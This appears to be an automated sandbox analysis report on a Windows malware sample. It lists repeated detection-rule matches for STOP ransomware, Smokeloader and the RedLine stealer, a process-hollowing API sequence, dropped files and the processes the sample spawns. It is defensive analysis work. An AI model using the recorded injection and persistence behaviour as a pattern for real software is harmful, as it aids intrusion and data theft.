Source: 28.0.A658.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 28.0.A658.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 28.0.A658.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 28.0.A658.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 28.0.A658.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 28.0.A658.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 28.0.A658.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 28.2.A658.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 28.2.A658.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 28.2.A658.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 28.0.A658.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 28.0.A658.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 28.0.A658.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 28.2.A658.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 28.2.A658.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 28.2.A658.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 28.0.A658.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 28.0.A658.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 28.0.A658.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 28.0.A658.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 28.0.A658.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 28.0.A658.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 28.0.A658.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 28.0.A658.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 28.0.A658.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 28.0.A658.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 28.0.A658.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 28.0.A658.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000002.343161421.00000000040E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.294980929.00000000026E7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001C.00000000.451618454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000001C.00000000.451618454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000001C.00000000.451618454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000014.00000002.419481551.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000001B.00000002.457366920.000000000066D000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001C.00000002.485432276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000001C.00000002.485432276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000001C.00000002.485432276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001C.00000000.447519166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000001C.00000000.447519166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000001C.00000000.447519166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.295278143.0000000004271000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000000.278637701.0000000002651000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001B.00000002.458620558.0000000002340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000002.342997867.0000000002546000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.294639140.0000000002680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000014.00000002.418304961.0000000000499000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.294702276.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001C.00000000.445516045.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000002.343191676.00000000040F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000011.00000002.343211043.0000000004111000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001C.00000000.448145727.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000001C.00000000.448145727.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000001C.00000000.448145727.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001C.00000000.449295110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000001C.00000000.449295110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000001C.00000000.449295110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001C.00000000.446739246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000001C.00000000.446739246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000001C.00000000.446739246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: A658.exe PID: 5244, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: String function: 00409F79 appears 112 times
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: String function: 0041BE00 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: String function: 0058A1E0 appears 112 times
Source: C:\Users\user\AppData\Local\Temp\A658.exe Code function: String function: 02368EC0 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\A658.exe Code function: String function: 02370160 appears 31 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_004017E3 Sleep,NtTerminateProcess, 0_2_004017E3
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_00402351 NtOpenKey,NtEnumerateKey,NtEnumerateKey, 0_2_00402351
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_00402072 NtQuerySystemInformation, 0_2_00402072
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_00401807 Sleep,NtTerminateProcess, 0_2_00401807
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_004014DF NtMapViewOfSection,NtMapViewOfSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004014DF
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_004017E2 Sleep,NtTerminateProcess, 0_2_004017E2
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_004017EE Sleep,NtTerminateProcess, 0_2_004017EE
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_00401EFD NtQuerySystemInformation, 0_2_00401EFD
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_004017E3 Sleep,NtTerminateProcess, 17_2_004017E3
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_00402351 NtOpenKey,NtEnumerateKey,NtEnumerateKey, 17_2_00402351
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_00402072 NtQuerySystemInformation, 17_2_00402072
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_00401807 Sleep,NtTerminateProcess, 17_2_00401807
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_004014DF NtMapViewOfSection,NtMapViewOfSection,NtMapViewOfSection,NtMapViewOfSection, 17_2_004014DF
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_004017E2 Sleep,NtTerminateProcess, 17_2_004017E2
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_004017EE Sleep,NtTerminateProcess, 17_2_004017EE
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_00401EFD NtQuerySystemInformation, 17_2_00401EFD
Source: C:\Users\user\AppData\Local\Temp\A658.exe Code function: 27_2_02340110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 27_2_02340110
Source: A658.exe.4.dr Static PE information: Section: .data ZLIB complexity 0.9907388906649617
Source: A658.exe.28.dr Static PE information: Section: .data ZLIB complexity 0.9907388906649617
Source: 5tLwjRFzAW.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\irbiwat Jump to behavior
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@19/22@31/12
Source: C:\Users\user\AppData\Local\Temp\A658.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E69F.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\5tLwjRFzAW.exe "C:\Users\user\Desktop\5tLwjRFzAW.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\irbiwat C:\Users\user\AppData\Roaming\irbiwat
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\28E9.exe C:\Users\user\AppData\Local\Temp\28E9.exe
